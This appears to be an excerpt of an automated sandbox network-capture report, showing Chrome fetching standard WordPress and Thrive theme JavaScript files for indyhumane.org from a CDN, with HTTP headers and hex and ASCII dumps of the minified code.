                                                                                                                                                                                                                                                        Data Ascii: .appendChild(t)}}(),i(t),o.addResizeCallback(i),function(t){t.find("a > .tcb-col, a > .thrv-content-box").each((function(){const t=this.parentNode,o={"data-href":t.href,"data-hash":t.hash,"jump-animation":t.getAttribute("jump-animation"),"data-target":t.g
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 30 2c 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 22 3a 30 2c 22 7a 2d 69 6e 64 65 78 22 3a 33 7d 29 2c 6e 2e 63 73 73 28 7b 22 6d 69 6e 2d 68 65 69 67 68 74 22 3a 22 63 61 6c 63 28 20 31 30 30 76 68 20 2d 20 22 2b 65 2b 22 70 78 20 29 20 22 2c 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 22 3a 65 2c 22 62 6f 78 2d 73 69 7a 69 6e 67 22 3a 22 75 6e 73 65 74 22 7d 29 2c 74 2e 63 73 73 28 22 6f 76 65 72 66 6c 6f 77 2d 78 22 2c 22 76 69 73 69 62 6c 65 22 29 29 29 7d 3b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 3f 6e 65 77 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 28 28 28 29 3d 3e 7b 73 28 29 7d 29 29 2e 6f 62 73 65 72 76 65 28 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 3a 73
                                                                                                                                                                                                                                                        Data Ascii: 0,"padding-bottom":0,"z-index":3}),n.css({"min-height":"calc( 100vh - "+e+"px ) ","padding-bottom":e,"box-sizing":"unset"}),t.css("overflow-x","visible")))};"undefined"!=typeof ResizeObserver?new ResizeObserver((()=>{s()})).observe(window.document.body):s
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 74 61 2d 73 77 69 74 63 68 2d 6f 6e 2d 73 63 72 6f 6c 6c 22 2c 54 43 42 5f 46 72 6f 6e 74 2e 67 65 74 44 69 73 70 6c 61 79 54 79 70 65 28 29 29 3b 69 66 28 72 26 26 21 69 73 4e 61 4e 28 72 29 29 7b 61 2e 61 64 64 43 6c 61 73 73 28 6e 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 29 3b 63 6f 6e 73 74 20 74 3d 7b 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 2c 6f 70 61 63 69 74 79 3a 30 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 22 62 6f 78 2d 73 69 7a 69 6e 67 22 3a 22 62 6f 72 64 65 72 2d 62 6f 78 22 2c 6c 65 66 74 3a 30 2c 74 6f 70 3a 73 7d 3b 61 2e 63 73 73 28 74 29 2e 61 64 64 43 6c 61 73 73 28 22 74 68 72 69 76 65 2d 73 79 6d 62 6f 6c 2d 73 68 6f 72 74 63 6f 64 65 2d 73 63 72 6f 6c 6c 22 29 2e 69 6e 73 65 72 74 41 66 74 65 72 28 6c 29 2c 61
                                                                                                                                                                                                                                                        Data Ascii: ta-switch-on-scroll",TCB_Front.getDisplayType());if(r&&!isNaN(r)){a.addClass(n).removeClass(i);const t={position:"absolute",opacity:0,width:"100%","box-sizing":"border-box",left:0,top:s};a.css(t).addClass("thrive-symbol-shortcode-scroll").insertAfter(l),a


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        28192.168.2.449780192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC409OUTGET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:11 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 9141
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/dist/i18n.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 15 Feb 2024 16:53:15 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca HIT
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC748INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 32 30 35 38 3a 28 74 2c 65 2c 72 29 3d 3e 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 7b 6e 6f 74 5f 73 74 72 69 6e 67 3a 2f 5b 5e 73 5d 2f 2c 6e 6f 74 5f 62 6f 6f 6c 3a 2f 5b 5e 74 5d 2f 2c 6e 6f 74 5f 74 79 70 65 3a 2f 5b 5e 54 5d 2f 2c 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 3a 2f 5b 5e 76 5d 2f 2c 6e 75 6d 62 65 72 3a 2f 5b 64 69 65 66 67 5d 2f 2c 6e 75 6d 65 72 69 63 5f 61 72 67 3a 2f 5b 62 63 64 69 65 66 67 75 78 58 5d 2f 2c 6a 73 6f 6e 3a 2f 5b 6a 5d 2f 2c 6e 6f 74 5f 6a 73 6f 6e 3a 2f 5b 5e 6a 5d 2f 2c 74 65 78 74 3a 2f 5e 5b 5e 5c 78 32
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated */(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x2
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 6f 70 65 72 74 79 20 22 25 73 22 20 6f 66 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 20 22 25 73 22 27 2c 73 2e 6b 65 79 73 5b 6f 5d 2c 73 2e 6b 65 79 73 5b 6f 2d 31 5d 29 29 3b 72 3d 72 5b 73 2e 6b 65 79 73 5b 6f 5d 5d 7d 65 6c 73 65 20 72 3d 73 2e 70 61 72 61 6d 5f 6e 6f 3f 65 5b 73 2e 70 61 72 61 6d 5f 6e 6f 5d 3a 65 5b 64 2b 2b 5d 3b 69 66 28 69 2e 6e 6f 74 5f 74 79 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 69 2e 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 75 6e 63 74 69 6f 6e 26 26 28 72 3d 72 28 29 29 2c 69 2e 6e 75 6d 65 72 69 63 5f 61 72 67 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 72 26 26 69 73 4e
                                                                                                                                                                                                                                                        Data Ascii: operty "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&isN
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 73 74 28 73 2e 74 79 70 65 29 3f 67 2b 3d 72 3a 28 21 69 2e 6e 75 6d 62 65 72 2e 74 65 73 74 28 73 2e 74 79 70 65 29 7c 7c 63 26 26 21 73 2e 73 69 67 6e 3f 66 3d 22 22 3a 28 66 3d 63 3f 22 2b 22 3a 22 2d 22 2c 72 3d 72 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 69 2e 73 69 67 6e 2c 22 22 29 29 2c 75 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3d 3d 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3a 73 2e 70 61 64 5f 63 68 61 72 2e 63 68 61 72 41 74 28 31 29 3a 22 20 22 2c 70 3d 73 2e 77 69 64 74 68 2d 28 66 2b 72 29 2e 6c 65 6e 67 74 68 2c 6c 3d 73 2e 77 69 64 74 68 26 26 70 3e 30 3f 75 2e 72 65 70 65 61 74 28 70 29 3a 22 22 2c 67 2b 3d 73 2e 61 6c 69 67 6e 3f 66 2b 72 2b 6c 3a 22 30 22 3d 3d 3d 75 3f 66 2b 6c 2b 72 3a 6c 2b 66 2b 72 29 7d
                                                                                                                                                                                                                                                        Data Ascii: st(s.type)?g+=r:(!i.number.test(s.type)||c&&!s.sign?f="":(f=c?"+":"-",r=r.toString().replace(i.sign,"")),u=s.pad_char?"0"===s.pad_char?"0":s.pad_char.charAt(1):" ",p=s.width-(f+r).length,l=s.width&&p>0?u.repeat(p):"",g+=s.align?f+r+l:"0"===u?f+l+r:l+f+r)}
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 73 70 72 69 6e 74 66 3a 61 2c 76 73 70 72 69 6e 74 66 3a 6f 7d 7d 2e 63 61 6c 6c 28 65 2c 72 2c 65 2c 74 29 29 7c 7c 28 74 2e 65 78 70 6f 72 74 73 3d 6e 29 29 7d 28 29 7d 7d 2c 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 69 29 72 65 74 75 72 6e 20 69 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 61 3d 65 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 5d 28 61 2c 61 2e 65 78 70 6f 72 74 73 2c 72 29 2c 61 2e 65 78 70 6f 72 74 73 7d 72 2e 6e 3d 74 3d 3e 7b 76 61 72 20 65 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 28 29 3d 3e 74 2e 64 65 66 61 75 6c 74 3a 28 29 3d 3e 74 3b 72 65 74 75 72 6e 20 72 2e 64 28 65 2c 7b 61 3a 65 7d 29 2c 65 7d 2c 72
                                                                                                                                                                                                                                                        Data Ascii: sprintf:a,vsprintf:o}}.call(e,r,e,t))||(t.exports=n))}()}},e={};function r(n){var i=e[n];if(void 0!==i)return i.exports;var a=e[n]={exports:{}};return t[n](a,a.exports,r),a.exports}r.n=t=>{var e=t&&t.__esModule?()=>t.default:()=>t;return r.d(e,{a:e}),e},r
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 6c 2c 69 3d 30 7d 2c 61 7d 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 2e 2e 2e 72 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 28 29 2e 73 70 72 69 6e 74 66 28 74 2c 2e 2e 2e 72 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 26 26 69 28 22 73 70 72 69 6e 74 66 20 65 72 72 6f 72 3a 20 5c 6e 5c 6e 22 2b 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 2c 74 7d 7d 76 61 72 20 6f 2c 73 2c 6c 2c 75 3b 6f 3d 7b 22 28 22 3a 39 2c 22 21 22 3a 38 2c 22 2a 22 3a 37 2c 22 2f 22 3a 37 2c 22 25 22 3a 37 2c 22 2b 22 3a 36 2c 22 2d 22 3a 36 2c 22 3c 22 3a 35 2c 22 3c 3d 22 3a 35 2c 22 3e 22 3a 35 2c 22 3e 3d 22 3a 35 2c 22 3d 3d 22 3a 34 2c 22 21 3d 22 3a 34 2c 22 26 26 22 3a 33
                                                                                                                                                                                                                                                        Data Ascii: l,i=0},a}(console.error);function a(t,...r){try{return e().sprintf(t,...r)}catch(e){return e instanceof Error&&i("sprintf error: \n\n"+e.toString()),t}}var o,s,l,u;o={"(":9,"!":8,"*":7,"/":7,"%":7,"+":6,"-":6,"<":5,"<=":5,">":5,">=":5,"==":4,"!=":4,"&&":3
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 2c 69 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 74 7d 7d 65 6c 73 65 20 73 3d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 3f 65 5b 6f 5d 3a 2b 6f 3b 6c 2e 70 75 73 68 28 73 29 7d 72 65 74 75 72 6e 20 6c 5b 30 5d 7d 28 65 2c 74 29 7d 7d 76 61 72 20 66 3d 7b 63 6f 6e 74 65 78 74 44 65 6c 69 6d 69 74 65 72 3a 22 04 22 2c 6f 6e 4d 69 73 73 69 6e 67 4b 65 79 3a 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 20 69 6e 20 74 68 69 73 2e 64 61 74 61 3d 74 2c 74 68 69 73 2e 70 6c 75 72 61 6c 46 6f 72 6d 73 3d 7b 7d 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 7b 7d 2c 66 29 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 72 5d 3d 76 6f 69 64 20 30 21 3d 3d 65 26 26 72 20 69 6e 20 65 3f 65 5b 72 5d 3a
                                                                                                                                                                                                                                                        Data Ascii: ,i)}catch(t){return t}}else s=e.hasOwnProperty(o)?e[o]:+o;l.push(s)}return l[0]}(e,t)}}var f={contextDelimiter:"",onMissingKey:null};function d(t,e){var r;for(r in this.data=t,this.pluralForms={},this.options={},f)this.options[r]=void 0!==e&&r in e?e[r]:
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 74 75 72 6e 20 72 3f 28 69 3d 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 22 2c 69 2c 74 2c 65 2c 6e 29 2c 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 5f 22 2b 75 28 6e 29 2c 69 2c 74 2c 65 2c 6e 29 29 3a 69 7d 3b 69 66 28 74 26 26 73 28 74 2c 65 29 2c 72 29 7b 63 6f 6e 73 74 20 74 3d 74 3d 3e 7b 67 2e 74 65 73 74 28 74 29 26 26 61 28 29 7d 3b 72 2e 61 64 64 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 41 64 64 65 64 22 2c 22 63 6f 72 65 2f 69 31 38 6e 22 2c 74 29 2c 72 2e 61 64 64 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 2c 22 63 6f 72 65 2f 69 31 38 6e 22 2c 74 29 7d 72 65 74 75 72 6e 7b
                                                                                                                                                                                                                                                        Data Ascii: turn r?(i=r.applyFilters("i18n.gettext_with_context",i,t,e,n),r.applyFilters("i18n.gettext_with_context_"+u(n),i,t,e,n)):i};if(t&&s(t,e),r){const t=t=>{g.test(t)&&a()};r.addAction("hookAdded","core/i18n",t),r.addAction("hookRemoved","core/i18n",t)}return{
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC179INData Raw: 61 2e 62 69 6e 64 28 62 29 2c 6b 3d 62 2e 73 75 62 73 63 72 69 62 65 2e 62 69 6e 64 28 62 29 2c 46 3d 62 2e 5f 5f 2e 62 69 6e 64 28 62 29 2c 53 3d 62 2e 5f 78 2e 62 69 6e 64 28 62 29 2c 6a 3d 62 2e 5f 6e 2e 62 69 6e 64 28 62 29 2c 4c 3d 62 2e 5f 6e 78 2e 62 69 6e 64 28 62 29 2c 54 3d 62 2e 69 73 52 54 4c 2e 62 69 6e 64 28 62 29 2c 44 3d 62 2e 68 61 73 54 72 61 6e 73 6c 61 74 69 6f 6e 2e 62 69 6e 64 28 62 29 7d 29 28 29 2c 28 77 69 6e 64 6f 77 2e 77 70 3d 77 69 6e 64 6f 77 2e 77 70 7c 7c 7b 7d 29 2e 69 31 38 6e 3d 6e 7d 29 28 29 3b
                                                                                                                                                                                                                                                        Data Ascii: a.bind(b),k=b.subscribe.bind(b),F=b.__.bind(b),S=b._x.bind(b),j=b._n.bind(b),L=b._nx.bind(b),T=b.isRTL.bind(b),D=b.hasTranslation.bind(b)})(),(window.wp=window.wp||{}).i18n=n})();


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        29192.168.2.449784192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC409OUTGET /wp-includes/js/dist/a11y.min.js?ver=3156534cc54473497e14 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:11 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 2358
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/dist/a11y.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 01:55:35 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC748INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 6e 3a 74 3d 3e 7b 76 61 72 20 6e 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 28 29 3d 3e 74 2e 64 65 66 61 75 6c 74 3a 28 29 3d 3e 74 3b 72 65 74 75 72 6e 20 65 2e 64 28 6e 2c 7b 61 3a 6e 7d 29 2c 6e 7d 2c 64 3a 28 74 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 6e 29 65 2e 6f 28 6e 2c 6f 29 26 26 21 65 2e 6f 28 74 2c 6f 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6f 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 6f 5d 7d 29 7d 2c 6f 3a 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated */(()=>{"use strict";var e={n:t=>{var n=t&&t.__esModule?()=>t.default:()=>t;return e.d(n,{a:n}),n},d:(t,n)=>{for(var o in n)e.o(n,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:n[o]})},o:(e,t)=>Object.prototyp
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 20 68 69 64 64 65 6e 3b 63 6c 69 70 3a 20 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 62 6f 72 64 65 72 3a 20 30 3b 77 6f 72 64 2d 77 72 61 70 3a 20 6e 6f 72 6d 61 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 69 76 65 22 2c 65 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 72 65 6c 65 76 61 6e 74 22 2c 22 61 64 64 69 74 69 6f 6e 73 20 74 65 78 74 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 61 74 6f 6d 69 63 22 2c 22 74 72 75 65 22 29 3b 63 6f 6e 73 74 7b
                                                                                                                                                                                                                                                        Data Ascii: hidden;clip: rect(1px, 1px, 1px, 1px);-webkit-clip-path: inset(50%);clip-path: inset(50%);border: 0;word-wrap: normal !important;"),t.setAttribute("aria-live",e),t.setAttribute("aria-relevant","additions text"),t.setAttribute("aria-atomic","true");const{
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC241INData Raw: 28 35 30 25 29 3b 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 62 6f 72 64 65 72 3a 20 30 3b 77 6f 72 64 2d 77 72 61 70 3a 20 6e 6f 72 6d 61 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 22 29 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 68 69 64 64 65 6e 22 2c 22 68 69 64 64 65 6e 22 29 3b 63 6f 6e 73 74 7b 62 6f 64 79 3a 74 7d 3d 64 6f 63 75 6d 65 6e 74 3b 74 26 26 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 28 29 2c 6e 75 6c 6c 3d 3d 3d 74 26 26 69 28 22 61 73 73 65 72 74 69 76 65 22 29 2c 6e 75 6c 6c 3d 3d 3d 6e 26 26 69 28 22 70 6f 6c 69 74 65 22 29 7d 6f 28 29 28 70 29 2c 28 77 69 6e 64 6f 77 2e 77 70 3d 77 69 6e 64 6f 77 2e 77 70 7c 7c 7b 7d 29 2e 61 31 31 79 3d 74 7d 29 28 29 3b
                                                                                                                                                                                                                                                        Data Ascii: (50%);clip-path: inset(50%);border: 0;word-wrap: normal !important;"),e.setAttribute("hidden","hidden");const{body:t}=document;t&&t.appendChild(e)}(),null===t&&i("assertive"),null===n&&i("polite")}o()(p),(window.wp=window.wp||{}).a11y=t})();


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        30192.168.2.449782192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC600OUTGET /wp-content/themes/thrive-theme/inc/assets/dist/frontend.min.js?ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC654INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:11 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 29501
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/themes/thrive-theme/inc/assets/dist/frontend.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 17:13:47 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC715INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 35 35 36 30 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 65 3d 54 68 72 69 76 65 54 68 65 6d 65 2e 24 2c 74 2e 65 78 70 6f 72 74 73 3d 7b 69 73 4f 6e 53 63 72 65 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 5b 22 74 6f 70 22 2c 22 72 69 67 68 74 22 2c 22 62 6f 74 74 6f 6d 22 2c 22 6c 65 66 74 22 5d 3b 74 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 3f 5b 74 5d 3a 74 3b 63 6f 6e 73 74 20 69 3d 65 28 77 69 6e 64 6f 77 29 2c 73 3d 7b 74 6f 70 3a 69 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 6c 65 66 74 3a
